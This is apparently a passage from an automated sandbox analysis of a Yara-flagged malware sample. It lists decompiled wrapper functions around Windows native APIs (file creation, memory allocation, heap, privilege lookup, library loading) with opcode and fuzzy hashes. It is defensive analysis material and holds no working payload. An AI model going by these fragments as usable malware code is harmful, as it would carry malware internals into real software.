                                      • Instruction Fuzzy Hash: DA01A4B2205208ABCB18DF89DC95DEB77ADEF8C754F158248FA0997241D630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004185E0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E004185E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                      0x004185ef
                                      0x004185f7
                                      0x0041862d
                                      0x00418631

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004187C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                      0x004187cf
                                      0x004187d7
                                      0x004187f9
                                      0x004187fd

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B498F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 69e71376a6443e8b2eb60897db0d067a831b9c3ddccb42f004c9b901245b1883
                                      • Instruction ID: 8330ba31917084f790ea1425bf210e1738405e84dab5adee885bda4b7ddad8c6
                                      • Opcode Fuzzy Hash: 69e71376a6443e8b2eb60897db0d067a831b9c3ddccb42f004c9b901245b1883
                                      • Instruction Fuzzy Hash: 9190026260100503D21271594404716004AD7D4382F91C1B6A5014555ECA6589E6F171
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: bfc7307d785cfb93d97547e9e4a8dbd2523ec78489eec87ee2941029dac915e1
                                      • Instruction ID: 845f7406d5add1a3218f28621c93da3167c33cd1bb4585d794ec054096e342a8
                                      • Opcode Fuzzy Hash: bfc7307d785cfb93d97547e9e4a8dbd2523ec78489eec87ee2941029dac915e1
                                      • Instruction Fuzzy Hash: 3C90027220100413D222615945047070049D7D4382F91C5A6A4414558D969689A6F161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 9f5136938eb05283d07f51c4cfab349f9d7e0b13d919dfb150ca6c4966c44b71
                                      • Instruction ID: 714a50d4a6e942a44cb19c42eb2479c4ebd5840c7981ffedd23a863876c7ea47
                                      • Opcode Fuzzy Hash: 9f5136938eb05283d07f51c4cfab349f9d7e0b13d919dfb150ca6c4966c44b71
                                      • Instruction Fuzzy Hash: 1A900262242041535656B15944046074046E7E4382791C1A6A5404950C856698AAE661
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B499A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 7b7b0275314122453e69b04ce0b9fe8929c3f19c5c92c22027c41d513de4422b
                                      • Instruction ID: 4fe3b692b7cb902f1aa06d08552bfd993dab26e60bd7a7057d6fb95c7bc947cc
                                      • Opcode Fuzzy Hash: 7b7b0275314122453e69b04ce0b9fe8929c3f19c5c92c22027c41d513de4422b
                                      • Instruction Fuzzy Hash: 359002A234100443D21161594414B060045D7E5342F51C1A9E5054554D8659CCA6B166
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 795d7c73cd91886d4d45f21495d2f1501e697e59765758ae9c107ad7779eaae7
                                      • Instruction ID: 9efc5011c0a063c2e318e23a73d3bc63c1ae30b44c13d603c805e79a40fbc558
                                      • Opcode Fuzzy Hash: 795d7c73cd91886d4d45f21495d2f1501e697e59765758ae9c107ad7779eaae7
                                      • Instruction Fuzzy Hash: BB9002B220100403D251715944047460045D7D4342F51C1A5A9054554E86998DE9B6A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 4762c566501cd05674cb7f4649ddfc947e027ff29950426abff504c27fbe8a68
                                      • Instruction ID: f5601d963ada4d841ece04882a299c3c45331edde5ff4d580e352fea839c77df
                                      • Opcode Fuzzy Hash: 4762c566501cd05674cb7f4649ddfc947e027ff29950426abff504c27fbe8a68
                                      • Instruction Fuzzy Hash: 9890026260100043425171698844A064045FBE5352751C2B5A4988550D859988B9A6A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 256a1c1484f2175713d273cabc45dcc3e0bef95379f2fdaa3bbcb0a6238c3cd9
                                      • Instruction ID: 9a55bfebe5a8d754735f135fc6a882413f119c5a2c81b10b5f8e84853abdfd1a
                                      • Opcode Fuzzy Hash: 256a1c1484f2175713d273cabc45dcc3e0bef95379f2fdaa3bbcb0a6238c3cd9
                                      • Instruction Fuzzy Hash: 9E90027220140403D2116159481470B0045D7D4343F51C1A5A5154555D866588A5B5B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 5040131e72b6f5df0f43a7473813fe5a907d09458c29766e6d55feebda01f716
                                      • Instruction ID: 0b9c9212b72373d14ba35a5702cca01865f575f9109163c19cefced9a22f3c1e
                                      • Opcode Fuzzy Hash: 5040131e72b6f5df0f43a7473813fe5a907d09458c29766e6d55feebda01f716
                                      • Instruction Fuzzy Hash: 5290026221180043D31165694C14B070045D7D4343F51C2A9A4144554CC95588B5A561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B495D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 29ec1c2d8fac60af3cead5afdd578a1161d67d9d3dfd23f1472e0ccf7b779de3
                                      • Instruction ID: f26e26c56a7ce99ef4dba83db7322943a5a37e7fb6546778795c2b1a6ed46e33
                                      • Opcode Fuzzy Hash: 29ec1c2d8fac60af3cead5afdd578a1161d67d9d3dfd23f1472e0ccf7b779de3
                                      • Instruction Fuzzy Hash: 8B9002A220200003421671594414716404AD7E4342B51C1B5E5004590DC56588E5B165
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 3c6277010763791c327baa8eb9792aa7cf7fe14545d9600f321d39c7cfa3cfc8
                                      • Instruction ID: 850e32ade888b9a86e8f8a2be28b9c5f6ec92f743e74c844d93a2f648b5ed76d
                                      • Opcode Fuzzy Hash: 3c6277010763791c327baa8eb9792aa7cf7fe14545d9600f321d39c7cfa3cfc8
                                      • Instruction Fuzzy Hash: 15900266211000030216A55907046070086D7D9392351C1B5F5005550CD66188B5A161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B496E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 4b814a433ba3cce9d348c848cb818d8c436e9f68fb1c4df0ea2a3374caf00dad
                                      • Instruction ID: b94fa48051c92ac7583e147be2259a87deff5058f498606b71f5bfb4de807170
                                      • Opcode Fuzzy Hash: 4b814a433ba3cce9d348c848cb818d8c436e9f68fb1c4df0ea2a3374caf00dad
                                      • Instruction Fuzzy Hash: 1390027220108803D2216159840474A0045D7D4342F55C5A5A8414658D86D588E5B161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 5c24ddeaf74e7344ccc80815ac7bc5f783418e3bd0a7a1403667944653dfbb80
                                      • Instruction ID: bc5cacd025cd5e0ec0b1d696fbdd770d5b44ea96997f860e7ba29c27eed70bcb
                                      • Opcode Fuzzy Hash: 5c24ddeaf74e7344ccc80815ac7bc5f783418e3bd0a7a1403667944653dfbb80
                                      • Instruction Fuzzy Hash: C790027220100803D2917159440474A0045D7D5342F91C1A9A4015654DCA558AADB7E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B497A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 28a11c7a951677ae60620fdd7993163bcf38c3e7830c9238d4d1d0fe27c591c9
                                      • Instruction ID: 461f36d2e09070c14cb57cf5fb129837064e982c7cf9cfe39a152bc15e8d5a6c
                                      • Opcode Fuzzy Hash: 28a11c7a951677ae60620fdd7993163bcf38c3e7830c9238d4d1d0fe27c591c9
                                      • Instruction Fuzzy Hash: 1090026230100003D251715954187064045E7E5342F51D1A5E4404554CD95588AAA262
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: bc5b5c9517f3d3bd7102296c0cb21f51f014959bb2c9c80d7f3b1ff9596eb51a
                                      • Instruction ID: 5167cc4d01a14b7eed773396f25cdf1651c3e7c1a2c033e48cf79576b45be3c3
                                      • Opcode Fuzzy Hash: bc5b5c9517f3d3bd7102296c0cb21f51f014959bb2c9c80d7f3b1ff9596eb51a
                                      • Instruction Fuzzy Hash: 4090026A21300003D2917159540870A0045D7D5343F91D5A9A4005558CC95588BDA361
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: e11976d415c95d3a94a8a4c2002d874a1b19f10bf2c3e88ef982e38139888971
                                      • Instruction ID: 9ebf66c67c81feec9e126c184549ffd9f22eb831edc6bf4581fe41fa542f364b
                                      • Opcode Fuzzy Hash: e11976d415c95d3a94a8a4c2002d874a1b19f10bf2c3e88ef982e38139888971
                                      • Instruction Fuzzy Hash: D090027231114403D221615984047060045D7D5342F51C5A5A4814558D86D588E5B162
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 38eb106b70a3dc900ee544d8e16de99d973a83ec855e7510a8a778e04d9a061d
                                      • Instruction ID: 8b439ab146bcbb262f60270f6a9b27c75e449b7c8b011ae03b2ae7e92ca07fd3
                                      • Opcode Fuzzy Hash: 38eb106b70a3dc900ee544d8e16de99d973a83ec855e7510a8a778e04d9a061d
                                      • Instruction Fuzzy Hash: D790027220100403D211659954087460045D7E4342F51D1A5A9014555EC6A588E5B171
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004088D0, Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                      • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                                      • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                      • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004188B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                      0x004188c7
                                      0x004188d2
                                      0x004188dd
                                      0x004188e1

                                      APIs
                                      • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID: 65A
                                      • API String ID: 1279760036-2085483392
                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                      • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                                      • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                      • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00407226, Relevance: 1.6, APIs: 1, Instructions: 52threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: 0e1def0b98318d3136c98bcb19dab893a189a184d534ebedeb990715dd8d9332
                                      • Instruction ID: 538198ce1569c8e82579eb21275d515646e6d627c332dc3780d365bcf992aa09
                                      • Opcode Fuzzy Hash: 0e1def0b98318d3136c98bcb19dab893a189a184d534ebedeb990715dd8d9332
                                      • Instruction Fuzzy Hash: 6F01F932A8132577EB116A919C43FFF73185F51B14F15056EFF04BA1C1DAA86D0346E9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00407253, Relevance: 1.6, APIs: 1, Instructions: 50threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: 9a5eb0530db8fc20d519655d713824f947ceb16988930ded73109f8ebdea5e66
                                      • Instruction ID: f924b05423921c298c07a5f464c17df3e3a1886863c9d4b91309168ac561dd05
                                      • Opcode Fuzzy Hash: 9a5eb0530db8fc20d519655d713824f947ceb16988930ded73109f8ebdea5e66
                                      • Instruction Fuzzy Hash: C301F431E8122976E720AA959C02FFE772C5B40B15F15016EFF04BA1C2DAAC6D0642FA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418A43, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: cea14f0c7c1bd9f2108a848fcbfa9a58543c13b334516873183ac3ced88309ad
                                      • Instruction ID: 58d0187040e7ba06f9df08f3c805b16b68a971f948a3e4d96b8f18db58c8e3e6
                                      • Opcode Fuzzy Hash: cea14f0c7c1bd9f2108a848fcbfa9a58543c13b334516873183ac3ced88309ad
                                      • Instruction Fuzzy Hash: 66F0A0B26402056FCB10DF54CC40EE73B68EF89350F14816AF94C9B342CA35E892CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004188E7, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: e362ae5d130734f45da1a7d6e4a3f361b9597b50b506adef37d2ce7991dabd76
                                      • Instruction ID: 4223564132819b0388cea8ad38e44929cd0fcfff003ce266c96bacdeffb690d9
                                      • Opcode Fuzzy Hash: e362ae5d130734f45da1a7d6e4a3f361b9597b50b506adef37d2ce7991dabd76
                                      • Instruction Fuzzy Hash: 45E06DB1204201ABE718EF54DC54EDB7769EF88750F144589F9485B242C631E950CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004188F0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                      • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                      • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418930, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID:
                                      • API String ID: 621844428-0
                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409B33, Relevance: 1.5, APIs: 1, Instructions: 11libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 16b38af5867c66ab1e7e91376a446ab78951f754c75f44e95e777516efec77ce
